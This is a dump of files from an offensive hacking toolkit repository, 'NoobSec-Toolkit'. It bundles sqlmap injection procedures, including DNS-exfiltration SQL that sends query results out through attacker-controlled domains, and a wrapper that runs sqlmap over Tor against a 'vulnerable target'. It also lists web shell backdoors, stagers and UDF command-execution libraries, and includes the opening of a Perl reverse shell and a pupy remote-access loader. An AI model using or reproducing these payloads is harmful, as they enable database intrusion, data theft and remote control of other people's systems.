'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') 3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mysql/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mysql/write_file_limit.sql: -------------------------------------------------------------------------------- 1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/oracle/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 3 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/postgresql/dns_request.sql: -------------------------------------------------------------------------------- 1 | DROP TABLE IF EXISTS %RANDSTR1%; 2 | CREATE TABLE %RANDSTR1%(%RANDSTR2% text); 3 | CREATE OR REPLACE FUNCTION %RANDSTR3%() 4 | RETURNS VOID AS $$ 5 | DECLARE %RANDSTR4% TEXT; 6 | DECLARE %RANDSTR5% TEXT; 7 | BEGIN 8 | SELECT INTO %RANDSTR5% (%QUERY%); 9 | %RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\''; 10 | EXECUTE %RANDSTR4%; 11 | END; 12 | $$ LANGUAGE plpgsql SECURITY DEFINER; 13 | SELECT %RANDSTR3%(); -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/backdoor.php_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/runcmd.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/runcmd.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/shell/stager.php_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/thirdparty/bottle/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/thirdparty/oset/__init__.py: -------------------------------------------------------------------------------- 1 | """Main Ordered Set module """ 2 | 3 | from pyoset import oset 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/txt/wordlist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/txt/wordlist.zip -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/sqlmapproject/udfhack. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/linux/32/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/linux/32/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/linux/64/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/linux/64/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/windows/32/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/windows/64/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/waf/proventia.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "Proventia Web Application Security (IBM)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if page is None: 13 | return False 14 | page, headers, code = get_page(url="/Admin_Files/") 15 | return page is None 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/waf/webappsecure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "webApp.secure (webScurity)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if code == 403: 13 | return False 14 | page, headers, code = get_page(get="nx=@@") 15 | return code == 403 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/xml/banner/oracle.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/xml/banner/sharepoint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/xml/banner/x-aspnet-version.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/databases/db_outdated: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/vscan/databases/db_outdated -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/docs/nikto_manual.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/vscan/docs/nikto_manual.html -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/htm_close.tmpl: -------------------------------------------------------------------------------- 1 |

© 2008 CIRT, Inc.

2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/htm_host_im.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
Information#TEMPL_SMMSG#
OSVDB EntriesOSVDB-#TEMPL_OSVDB#
11 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/htm_stop.tmpl: -------------------------------------------------------------------------------- 1 |

© 2007 CIRT, Inc.

2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/xml_close.tmpl: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/xml_end.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/xml_host_head.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | #TEMPL_SSL_INFO# 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/xml_host_im.tmpl: -------------------------------------------------------------------------------- 1 | 2 | #TEMPL_SMMSG# 3 | 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/xml_host_item.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/vscan/templates/xml_start.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/.DS_Store -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | plugins/db.py 3 | auth/ 4 | *.pyc 5 | *.jpg 6 | *.csv 7 | .swp 8 | .DS_Store 9 | .idea 10 | pastebin/seen-pastes.txt 11 | 12 | HOST-RESULTS.txt 13 | 14 | NET-RESULTS.txt 15 | 16 | config/pSearch.dat 17 | 18 | config/pSearch.old.dat 19 | 20 | config/pSearch.dat 21 | 22 | config/pSearch.dat 23 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/config/ports.txt: -------------------------------------------------------------------------------- 1 | 443 2 | 8443 3 | 4443 4 | 1443 5 | 8888 6 | 8080 -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/config/rssfilter.dat: -------------------------------------------------------------------------------- 1 | ddos 2 | hacked 3 | leak 4 | owned 5 | shooting 6 | bombing 7 | attack 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/config/webscrape.dat: -------------------------------------------------------------------------------- 1 | (([a-z]+:\/){0,1}\/.*.zip) 2 | (([a-z]+:\/){0,1}\/.*.pdf) 3 | (([a-z]+:\/){0,1}\/.*.rar) 4 | (([a-z]+:\/){0,1}\/.*.doc) 5 | (([a-z]+:\/){0,1}\/.*.docx) 6 | (([a-z]+:\/){0,1}\/.*.xls) 7 | (([a-z]+:\/){0,1}\/.*.xlsx) 8 | (([a-z]+:\/){0,1}\/.*.sql) 9 | (([a-z]+:\/){0,1}\/.*.pem) 10 | (([a-z]+:\/){0,1}\/.*.key) 11 | (([a-z]+:\/){0,1}\/.*.txt) 12 | (([a-z]+:\/){0,1}\/.*.7z) 13 | (([a-z]+:\/){0,1}\/.*.ppt) 14 | (([a-z]+:\/){0,1}\/.*.pptx) 15 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/pastebin/downloaded/test.test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/OSCAR/pastebin/downloaded/test.test -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/pastebin/test.test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/OSCAR/pastebin/test.test -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | import glob 3 | modules = glob.glob(os.path.dirname(__file__)+"/*.py") 4 | __all__ = [ os.path.basename(f)[:-3] for f in modules] -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/plugins/domainip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """Module to get the ip address of a given domain.""" 3 | #import socket :P -- Now that is how you comment in code. 4 | import socket 5 | 6 | def c(): 7 | """Get ipaddress of domain..GO DNS!""" 8 | domain = raw_input("Domain: ") 9 | #try to resolve. 10 | try: 11 | chk = socket.gethostbyname_ex(domain) 12 | except Exception: 13 | print "[+]ERROR: could not get hostname!" 14 | raise 15 | print "\nIP Address of", domain, ":", chk[2], "\n" 16 | return 17 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/requirements.txt: -------------------------------------------------------------------------------- 1 | Pillow==2.6.1 2 | click==3.3 3 | mechanize==0.2.5 4 | readline==6.2.4.1 5 | simplejson==3.6.4 6 | enum34==1.0.4 7 | ipaddr==2.1.11 8 | pyOpenSSL==0.14 9 | timeout==0.1.2 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/rss/filter.dat: -------------------------------------------------------------------------------- 1 | ddos 2 | hacked 3 | leak 4 | owned 5 | shooting 6 | bombing 7 | attack 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/rss/news/test.test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/OSCAR/rss/news/test.test -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/OSCAR/setup/requirements.txt: -------------------------------------------------------------------------------- 1 | Pillow==2.6.1 2 | readline==6.2.4.1 3 | requests==2.4.3 4 | shodan==1.1.2 5 | simplejson==3.6.4 6 | cryptography==0.8 7 | dnspython==1.12.0 8 | enum34==1.0.4 9 | ipaddr==2.1.11 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/dns.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sys, traceback 5 | print "-----------------------------------------------------------" 6 | print "Author: @Zic" 7 | print "Enter the domain below to gather basic DNS information." 8 | print "Example: website.com" 9 | print"------------------------------------------------------------" 10 | target = raw_input("Input Target: ") 11 | cmd1 = os.system ("nslookup -type=any " +target) 12 | 13 | print"-----------" 14 | print "Finished!" 15 | print "----------" 16 | 17 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/mir.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sys, traceback 5 | 6 | url = raw_input('What Service do you want to Mirror?: ') 7 | 8 | cmd1 = os.system ('wget -m'+url+') 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/pySteg/pysteg.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | print "-------------------------" 5 | print "StegHide Options" 6 | print "-------------------------" 7 | print "Usage Example :" 8 | print "" 9 | print"To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt" 10 | print "" 11 | print "To extract embedded data from stg.jpg: steghide extract -sf stg.jpg" 12 | 13 | cmd1 = os.system ("xterm ") 14 | 15 | 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | import os 5 | import traceback 6 | 7 | print "SQLI Injector" 8 | 9 | target = raw_input('SQLI Vulnerable Target: ') 10 | 11 | cmd1 = os.system ('python '+'tools/inject/sqlmap.py -u' +target+' --tor --tor-type=SOCKS5 --check-tor --tor-port=9050 --random-agent --level=3 --risk=3 --threads=2') 12 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "2.7" 4 | install: 5 | - pip install -r requirements.txt 6 | script: nosetests -vv --nocapture 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/auxiliary/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/auxiliary/web/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | yes | apt-get install --force-yes apache2 4 | yes | apt-get install --force-yes php5 5 | yes | apt-get install --force-yes libapache2-mod-php5 6 | yes | apt-get install --force-yes php5-cli 7 | mkdir /var/www/html 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/perl/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/perl/a.out -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/perl/prs1: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use strict; 4 | use Socket; 5 | use FileHandle; 6 | use POSIX; 7 | my $VERSION = "1.0"; 8 | 9 | # Where to send the reverse shell. Change these. 10 | my $ip = ' 11 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/client/sources/MyLoadLibrary.h: -------------------------------------------------------------------------------- 1 | #ifndef GENERALLOADLIBRARY_H 2 | #define GENERALLOADLIBRARY_H 3 | 4 | HMODULE MyLoadLibrary(LPCSTR, void *, void *); 5 | 6 | HMODULE MyGetModuleHandle(LPCSTR); 7 | 8 | BOOL MyFreeLibrary(HMODULE); 9 | 10 | FARPROC MyGetProcAddress(HMODULE, LPCSTR); 11 | 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /NoobSecToolkit 